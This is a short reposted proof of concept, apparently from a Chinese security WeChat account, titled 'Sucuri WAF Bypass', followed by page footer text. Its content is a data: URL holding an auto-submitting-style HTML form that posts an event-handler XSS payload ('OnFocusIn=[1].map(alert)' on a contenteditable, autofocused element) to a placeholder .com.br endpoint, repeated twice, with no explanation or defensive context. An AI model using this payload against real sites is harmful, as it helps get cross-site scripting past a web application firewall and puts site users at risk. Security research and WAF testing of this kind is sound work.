POC:
data:text/html,<form action=https://xxx.com.br/xss-waf.php method=post><input type=hidden name=a value="<K Contenteditable Autofocus OnFocusIn=[1].map(alert)>"><input type=submit value=XSS></form>
data:text/html,<form action=https://xxx.com.br/xss-waf.php method=post><input type=hidden name=a value="<K Contenteditable Autofocus OnFocusIn=[1].map(alert)>"><input type=submit value=XSS></form>
原文始发于微信公众号(Khan安全攻防实验室):Sucuri WAF Bypass
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论